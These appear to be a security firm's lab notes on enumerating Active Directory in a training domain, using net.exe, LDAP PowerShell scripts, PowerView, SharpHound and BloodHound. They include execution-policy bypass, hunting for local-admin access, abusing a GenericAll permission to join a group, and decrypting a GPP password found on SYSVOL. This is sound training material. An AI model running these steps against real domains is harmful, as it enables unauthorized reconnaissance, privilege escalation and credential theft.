Phone icon +45 45 34 44 00
Book meeting

Documentation

Introduction and Enumeration

22. Active Directory Introduction and Enumeration

more about AD https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/get-started/virtual-dc/active-directory-domain-services-overview

corp.com
stephanie

2.1. Active Directory - Enumeration Using Legacy Windows Tools

xfreerdp3 /u:stephanie /d:corp.com /v:192.168.202.75 /p:'LegmanTeamBenzoin!!'

use rdp instead PowerShell Remoting and winrm of due to https://posts.slayerlabs.com/double-hop/

net user /domain
net user jeffadmin /domain
net group /domain
net group "Sales Department" /domain

2.2. Enumerating Active Directory using PowerShell and .NET Classes

powershell cmdlets like  Get-ADUser  https://learn.microsoft.com/en-us/powershell/module/activedirectory/get-aduser?view=windowsserver2022-ps are only installed via Remote Server Administration Tools (RSAT)

LDAP communication with AD is not always straight-forward, but we'll leverage an Active Directory Services Interface (ADSI) (a set of interfaces built on COM) as an LDAP provider.
According to Microsoft's documentation, we need a specific LDAP ADsPath in order to communicate with the AD service. The LDAP path's prototype looks like this:
LDAP://HostName[:PortNumber][/DistinguishedName]

Primary Domain Controller (PDC). There can be only one PDC in a domain. To find the PDC, we need to find the DC holding the PdcRoleOwner property.
Example of DistinguishedName: CN=Stephanie,CN=Users,DC=corp,DC=com
CN=Common Name, DC=Domain Component

.NET classes
https://learn.microsoft.com/en-us/dotnet/api/ https://learn.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectory.domain?view=windowsdesktop-7.0
..who has the pdcrole, call

[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
powershell -ep bypass
..get DN
([adsi]'').distinguishedName
..ldap connection string
$PDC = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().PdcRoleOwner.Name
$DN = ([adsi]'').distinguishedName
$LDAP = "LDAP://$PDC/$DN"
$LDAP
2.3. Adding Search Functionality to our Script
System.DirectoryServices namespace, more specifically the DirectoryEntry and DirectorySearcher classes

...how to search users and there properties, see samAccountType

powershell -ep bypass

$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = $domainObj.PdcRoleOwner.Name
$DN = ([adsi]'').distinguishedName
$LDAP = "LDAP://$PDC/$DN"

$direntry = New-Object System.DirectoryServices.DirectoryEntry($LDAP)

$dirsearcher = New-Object System.DirectoryServices.DirectorySearcher($direntry)
$dirsearcher.filter="samAccountType=805306368"
#$dirsearcher.filter="name=jeffadmin"

$result = $dirsearcher.FindAll()

Foreach($obj in $result)
{
    Foreach($prop in $obj.Properties)
    {
#        $prop
        $prop.name
        $prop.memberof
    }

    Write-Host "-------------------------------"
}

... a function to search

function LDAPSearch {
    param (
        [string]$LDAPQuery
    )

    $PDC = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().PdcRoleOwner.Name
    $DistinguishedName = ([adsi]'').distinguishedName
    $DirectoryEntry = New-Object System.DirectoryServices.DirectoryEntry("LDAP://$PDC/$DistinguishedName")
    $DirectorySearcher = New-Object System.DirectoryServices.DirectorySearcher($DirectoryEntry, $LDAPQuery)
    return $DirectorySearcher.FindAll()

}

powershell -ep bypass
Import-Module .\function.ps1


... this show more groups than net.exe, including Print Operators, IIS_IUSRS, and others. This is because it enumerates all AD objects including Domain Local groups (not just global groups).

LDAPSearch -LDAPQuery "(samAccountType=805306368)"
LDAPSearch -LDAPQuery "(objectclass=group)"

.. show the content of each group, both users and other groups

foreach ($group in $(LDAPSearch -LDAPQuery "(objectCategory=group)")) { $group.properties | select {$_.cn}, {$_.member} }

$group = LDAPSearch -LDAPQuery "(&(objectCategory=group)(cn=Development Department*))"
$group.properties.member

$group = LDAPSearch -LDAPQuery "(&(objectCategory=group)(cn=Management Department*))"
$group.properties.member

... find user and show properties

$group = LDAPSearch -LDAPQuery "(&(objectCategory=user)(cn=michelle*))"
$group.properties

2.4. AD Enumeration with PowerView

PowerView

powershell -ep bypass
Import-Module c:\tools\PowerView.ps1
Get-NetDomain
... show all users properties
Get-NetUser

.. only show users name

Get-NetUser | select cn
Get-NetUser | select cn,pwdlastset,lastlogon
Get-NetGroup | select cn
Get-NetGroup "Sales Department" | select member
Get-NetGroup "Domain A*"
Get-NetUser fred

3. Manual Enumeration - Expanding our Repertoire

3.1. Enumerating Operating Systems

powershell -ep bypass
Import-Module c:\tools\PowerView.ps1
Get-NetComputer
Get-NetComputer | select operatingsystem,dnshostname
Get-NetComputer | select operatingsystem,operatingsystemversion,dnshostname

3.2. Getting an Overview - Permissions and Logged on Users

powershell -ep bypass
Import-Module c:\tools\PowerView.ps1

.... find other servers where i’m local admin
Find-LocalAdminAccess
Get-NetSession -ComputerName files04
Get-NetSession -ComputerName web04
Get-NetSession -ComputerName client74

... check HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\DefaultSecurity

Get-Acl -Path HKLM:SYSTEM\CurrentControlSet\Services\LanmanServer\DefaultSecurity\ | fl
Get-NetComputer | select dnshostname,operatingsystem,operatingsystemversion


PsLoggedOn application from the SysInternals Suite.
C:\tools\PSTools\PsLoggedon.exe \\client76

3.3. Enumeration Through Service Principal Names

setspn -L iis_service

powershell -ep bypass
Import-Module c:\tools\PowerView.ps1
Get-NetUser -SPN | select samaccountname,serviceprincipalname
nslookup.exe web04.corp.com

3.4. Enumerating Object Permissions

Access Control Entries (ACE). These ACEs make up the Access Control List (ACL)

AD permission types we look for. Microsoft documentation lists other permissions and describes each in more detail.
GenericAll: Full permissions on object
GenericWrite: Edit certain attributes on the object
WriteOwner: Change ownership of the object
WriteDACL: Edit ACE's applied to object
AllExtendedRights: Change password, reset password, etc.
ForceChangePassword: Password change for object
Self (Self-Membership): Add ourselves to for example a group

powershell -ep bypass
Import-Module c:\tools\PowerView.ps1
Get-ObjectAcl -Identity stephanie
Convert-SidToName S-1-5-21-1987370270-658905905-1781884369-1104
Convert-SidToName S-1-5-21-1987370270-658905905-1781884369-553

Get-ObjectAcl -Identity "Management Department" | ? {$_.ActiveDirectoryRights -eq "GenericAll"} | select SecurityIdentifier,ActiveDirectoryRights

"S-1-5-21-1987370270-658905905-1781884369-512","S-1-5-21-1987370270-658905905-1781884369-1104","S-1-5-32-548","S-1-5-18","S-1-5-21-1987370270-658905905-1781884369-519" | Convert-SidToName

net group "Management Department" stephanie /add /domain
Get-NetGroup "Management Department" | select member
net group "Management Department" stephanie /del /domain

3.5. Enumerating Domain Shares

powershell -ep bypass
Import-Module c:\tools\PowerView.ps1

...show shares in domain
Find-DomainShare

.. show shares in domain we have access to
Find-DomainShare -CheckShareAccess

ls \\dc1.corp.com\sysvol\corp.com\
ls \\dc1.corp.com\sysvol\corp.com\Policies
cat \\dc1.corp.com\sysvol\corp.com\Policies\oldpolicy\old-policy-backup.xml

... we found cpassword, which we can decrypt due to the key is posted on MSDN on kali
gpp-decrypt "+bsY0V3d4/KgX3VJdO/vyepPfAN1zMFTiQDApgR92JE"

..another interesting file
cat \\FILES04\docshare\docs\do-not-share\start-email.txt

4. Active Directory - Automated Enumeration
4.1. Collecting Data with SharpHound

https://github.com/BloodHoundAD/SharpHound/releases

powershell -ep bypass
Import-Module c:\tools\Sharphound.ps1

Get-Help Invoke-BloodHound

Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\users\marcus\documents\ -OutputPrefix "audit"


SharpHound also supports looping, which means that the collector will run cyclical queries of our choosing over a period. While the collection method we used above created a snapshot over the domain, running it in a loop may gather additional data as the environment changes. The cache file speeds up the process. For example, if a user logged on after we collected a snapshot, we would have missed it in our analysis.

4.2. Analysing Data using BloodHound

sudo apt install bloodhound
sudo neo4j start

login at url: http://localhost:7474/browser/ username: neo4j / password: neo4j

bloodhound

if errors:
$ bloodhound

 It seems it's the first time you run bloodhound

 Please run bloodhound-setup first

Do you want to run bloodhound-setup now? [Y/n] y

 [*] Starting PostgreSQL service

 [*] Creating Database
WARNING:  database "postgres" has a collation version mismatch
DETAIL:  The database was created using collation version 2.40, but the operating system provides version 2.41.
HINT:  Rebuild all objects in this database that use the default collation and run ALTER DATABASE postgres REFRESH COLLATION VERSION, or build PostgreSQL with the right library version.
User _bloodhound already exists in PostgreSQL
WARNING:  database "postgres" has a collation version mismatch
DETAIL:  The database was created using collation version 2.40, but the operating system provides version 2.41.
HINT:  Rebuild all objects in this database that use the default collation and run ALTER DATABASE postgres REFRESH COLLATION VERSION, or build PostgreSQL with the right library version.

 Creating database
WARNING:  database "postgres" has a collation version mismatch
DETAIL:  The database was created using collation version 2.40, but the operating system provides version 2.41.
HINT:  Rebuild all objects in this database that use the default collation and run ALTER DATABASE postgres REFRESH COLLATION VERSION, or build PostgreSQL with the right library version.
createdb: error: database creation failed: ERROR:  template database "template1" has a collation version mismatch
DETAIL:  The template database was created using collation version 2.40, but the operating system provides version 2.41.
HINT:  Rebuild all objects in the template database that use the default collation and run ALTER DATABASE template1 REFRESH COLLATION VERSION, or build PostgreSQL with the right library version.
psql: error: connection to server on socket "/var/run/postgresql/.s.PGSQL.5432" failed: FATAL:  database "bloodhound" does not exist

$ sudo -u postgres psql -c "ALTER DATABASE template1 REFRESH COLLATION VERSION;"
$ sudo -u postgres psql -c "ALTER DATABASE postgres REFRESH COLLATION VERSION;"

┌──(pentests㉿kali)-[~/beyond/webdav]
└─$ bloodhound

 It seems it's the first time you run bloodhound

 Please run bloodhound-setup first

Do you want to run bloodhound-setup now? [Y/n]

 [*] Starting PostgreSQL service

 [*] Creating Database
User _bloodhound already exists in PostgreSQL

 Creating database
ALTER ROLE

 [*] Starting neo4j
Neo4j is running at pid 341907

 [i] You need to change the default password for neo4j
     Default credentials are user:neo4j password:neo4j

 [!] IMPORTANT: Once you have setup the new password, please update /etc/bhapi/bhapi.json with the new password before running bloodhound

 opening http://localhost:7474/

Need a penetration test?

Contact us for a no-obligation conversation about your security needs.

Contact us